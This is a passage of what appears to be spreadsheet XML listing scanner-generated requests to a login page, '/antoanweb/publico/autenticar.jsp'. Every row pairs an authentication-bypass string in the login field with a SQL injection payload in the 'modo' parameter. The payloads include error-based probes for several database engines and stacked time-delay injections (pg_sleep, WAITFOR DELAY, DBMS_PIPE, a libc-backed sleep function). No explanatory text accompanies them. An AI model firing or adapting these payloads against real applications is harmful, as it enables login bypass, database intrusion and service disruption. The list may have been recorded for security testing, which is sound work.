    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1697"or8742=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase8742when8742then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58))and"feej"like"feej</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(8658=8658)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(6057=6057)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(5351=5351)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select4338=(ascii_char(58)||ascii_char(114)||ascii_char(116)||ascii_char(109)||ascii_char(58)||(selectcase4338when4338then1else0endfromrdb$database)||ascii_char(58)||ascii_char(101)||ascii_char(107)||ascii_char(121)||ascii_char(58)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(cast(chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(select(casewhen(3615=3615)then1else0end))::text||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)asnumeric))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(convert(int,(char(58)+char(114)+char(116)+char(109)+char(58)+(select(casewhen(1579=1579)thenchar(49)elsechar(48)end))+char(58)+char(101)+char(107)+char(121)+char(58))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(selectupper(xmltype(chr(60)||chr(58)||chr(114)||chr(116)||chr(109)||chr(58)||(replace((select(casewhen(6864=6864)then1else0end)fromdual),chr(32),chr(58)||chr(108)||chr(58)))||chr(58)||chr(101)||chr(107)||chr(121)||chr(58)||chr(62)))fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectpg_sleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectpg_sleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectpg_sleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectpg_sleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectpg_sleep(5);--and(326=326</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));selectpg_sleep(5);--and((8889=8889</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));selectpg_sleep(5);--and(((3508=3508</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;selectpg_sleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectpg_sleep(5);--and('mdkb'='mdkb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectpg_sleep(5);--and(('lhgm'='lhgm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectpg_sleep(5);--and((('yhuz'='yhuz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectpg_sleep(5);--and'semx'='semx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectpg_sleep(5);--and('lyzr'like'lyzr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectpg_sleep(5);--and(('wmxc'like'wmxc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectpg_sleep(5);--and((('imqb'like'imqb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectpg_sleep(5);--and'dbtu'like'dbtu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectpg_sleep(5);--and("vrlf"="vrlf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectpg_sleep(5);--and(("ilok"="ilok</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectpg_sleep(5);--and((("mbnw"="mbnw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectpg_sleep(5);--and"nxip"="nxip</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectpg_sleep(5);--and("qfhj"like"qfhj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectpg_sleep(5);--and(("ctzh"like"ctzh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectpg_sleep(5);--and((("wjhj"like"wjhj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectpg_sleep(5);--and"npzs"like"npzs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectcount(*)fromgenerate_series(1,5000000);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectcount(*)fromgenerate_series(1,5000000);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectcount(*)fromgenerate_series(1,5000000);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectcount(*)fromgenerate_series(1,5000000);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectcount(*)fromgenerate_series(1,5000000);--and(1157=1157</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));selectcount(*)fromgenerate_series(1,5000000);--and((9250=9250</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));selectcount(*)fromgenerate_series(1,5000000);--and(((3752=3752</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;selectcount(*)fromgenerate_series(1,5000000);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectcount(*)fromgenerate_series(1,5000000);--and('dbiq'='dbiq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectcount(*)fromgenerate_series(1,5000000);--and(('luzu'='luzu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectcount(*)fromgenerate_series(1,5000000);--and((('sqma'='sqma</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectcount(*)fromgenerate_series(1,5000000);--and'yulr'='yulr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectcount(*)fromgenerate_series(1,5000000);--and('yasd'like'yasd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectcount(*)fromgenerate_series(1,5000000);--and(('fkxh'like'fkxh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectcount(*)fromgenerate_series(1,5000000);--and((('ulac'like'ulac</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectcount(*)fromgenerate_series(1,5000000);--and'buvr'like'buvr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectcount(*)fromgenerate_series(1,5000000);--and("exhh"="exhh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectcount(*)fromgenerate_series(1,5000000);--and(("evhd"="evhd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectcount(*)fromgenerate_series(1,5000000);--and((("gaxu"="gaxu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectcount(*)fromgenerate_series(1,5000000);--and"pchb"="pchb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectcount(*)fromgenerate_series(1,5000000);--and("uwdl"like"uwdl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectcount(*)fromgenerate_series(1,5000000);--and(("puhf"like"puhf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectcount(*)fromgenerate_series(1,5000000);--and((("mcpe"like"mcpe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectcount(*)fromgenerate_series(1,5000000);--and"dpbn"like"dpbn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(9726=9726</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and((8078=8078</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(((1759=1759</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and('wdzc'='wdzc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(('puwh'='puwh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and((('tiqf'='tiqf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and'nvnh'='nvnh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and('rzhv'like'rzhv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(('nnkd'like'nnkd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and((('bzgt'like'bzgt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and'arbv'like'arbv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and("ghui"="ghui</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(("mmfo"="mmfo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and((("lxgb"="lxgb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and"nafu"="nafu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and("qmyb"like"qmyb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and(("oxgd"like"oxgd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and((("cnjw"like"cnjw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";createorreplacefunctionsleep(int)returnsintas'/lib/libc.so.6','sleep'language'c'strict;selectsleep(5);--and"ddbz"like"ddbz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);waitfordelay'0:0:5';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');waitfordelay'0:0:5';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';waitfordelay'0:0:5';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";waitfordelay'0:0:5';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);waitfordelay'0:0:5';--and(1274=1274</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));waitfordelay'0:0:5';--and((6916=6916</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));waitfordelay'0:0:5';--and(((4411=4411</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;waitfordelay'0:0:5';--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');waitfordelay'0:0:5';--and('tpze'='tpze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));waitfordelay'0:0:5';--and(('noda'='noda</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));waitfordelay'0:0:5';--and((('pnzf'='pnzf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';waitfordelay'0:0:5';--and'tgsb'='tgsb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');waitfordelay'0:0:5';--and('bicd'like'bicd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));waitfordelay'0:0:5';--and(('abgk'like'abgk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));waitfordelay'0:0:5';--and((('facm'like'facm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';waitfordelay'0:0:5';--and'kjml'like'kjml</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");waitfordelay'0:0:5';--and("rziw"="rziw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));waitfordelay'0:0:5';--and(("mrkg"="mrkg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));waitfordelay'0:0:5';--and((("idth"="idth</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";waitfordelay'0:0:5';--and"ngmw"="ngmw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");waitfordelay'0:0:5';--and("svdp"like"svdp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));waitfordelay'0:0:5';--and(("annq"like"annq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));waitfordelay'0:0:5';--and((("rvba"like"rvba</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";waitfordelay'0:0:5';--and"pvxx"like"pvxx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar);selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and(3614=3614</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar));selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and((3773=3773</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)));selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and(((6839=6839</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar;selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and('pazn'='pazn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and(('ozbf'='ozbf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and((('mcfk'='mcfk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and'hwqa'='hwqa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar');selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and('ndzy'like'ndzy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'));selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and(('wxtk'like'wxtk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')));selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and((('huxq'like'huxq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar';selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and'nzez'like'nzez</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and("inoh"="inoh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and(("jxpy"="jxpy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and((("utkh"="utkh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and"qvha"="qvha</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");selectdbms_pipe.receive_message(chr(65)||chr(66)||chr(81)||chr(76),5)fromdual;--and("hxwm"like"hxwm</t>
  </si>
  <si>
